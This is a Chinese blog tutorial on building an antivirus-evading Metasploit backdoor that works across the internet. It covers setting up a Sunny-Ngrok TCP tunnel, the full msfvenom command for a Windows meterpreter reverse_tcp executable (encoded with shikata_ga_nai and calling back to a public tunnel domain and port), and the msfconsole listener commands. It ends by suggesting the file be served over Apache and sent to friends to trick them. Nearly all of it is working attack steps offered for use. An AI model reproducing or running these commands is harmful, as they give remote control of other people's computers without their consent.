渗透测试(二)-Metasploit生成免杀后门(外网篇)

Love The Way You Lie 2022-10-15 13:57 369阅读 0赞

### 1. Sunny-Ngrok 开通隧道 ###

1.  首先在官网[注册会员][Link 1]
2.  [登陆][Link 2]
3.  选择要开通的服务器
4.  这里我们选择美国**Ngrok免费服务器**

![b0e1203b2dea74e4504c5091926bc859.png][]

![1943a23117b00659e72784743adde579.png][]

选择tcp协议，填一个可以使用的端口号。

![21815ff0ec03fce061d693790d9e9fc1.png][]

开通隧道后可以在 **隧道管理** 中看到自己的隧道信息：

记住这里的 **隧道id**，**赠送域名** 以及 **隧道端口**，下面会用到。

![addbcbec4a680926d89f28dbdf253733.png][]

### 2. 启动隧道 ###

首先在kali linux中下载对应的[客户端][Link 3]，选择Linux 64位版本。

![8f1cc5aedd9c4925604eb98dafe7493f.png][]

启动隧道：

./sunny clientid 隧道id

启动多个隧道：

./sunny clientid 隧道id,隧道id

要想后台运行可以使用 setsid 命令：

setsid ./sunny clientid 隧道id &

隧道连接成功后会显示：

### 3. 生成后门 ###

sudo su

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10716 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/shell.exe

这里和内网渗透的区别就是：将LHOST换成隧道的域名地址，将LPORT换成隧道端口。

如果想要在软件中绑定后门，按照 [渗透测试(一)-Metasploit生成免杀后门(内网篇)][-Metasploit] 文中第7步就行，**注意修改LHOST和LPORT**。

### 4. 监听 ###

msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 127.0.0.1
    set LPORT 10716
    run

### 5. 下载后门 ###

同样打开apache服务，下载后门，然后就可以发给你的小伙伴们去坑他们了！

[Link 1]: https://www.ngrok.cc/login/register
[Link 2]: https://www.ngrok.cc/login
[b0e1203b2dea74e4504c5091926bc859.png]: /images/20221014/a0b7ef62dd3646c88bd82109b41df4be.png
[1943a23117b00659e72784743adde579.png]: /images/20221014/5243d8457b034dd9b74c709d23e98b3f.png
[21815ff0ec03fce061d693790d9e9fc1.png]: /images/20221014/d979116f092f4d48be713e253ab27a71.png
[addbcbec4a680926d89f28dbdf253733.png]: /images/20221014/44a69ccb28434098a1c7741e1cd25c2d.png
[Link 3]: https://www.ngrok.cc/download.html
[8f1cc5aedd9c4925604eb98dafe7493f.png]: /images/20221014/2af69f9ae30e42219b1adfcb887e49c4.png
[-Metasploit]: https://blog.csdn.net/qq_42052733/article/details/117251056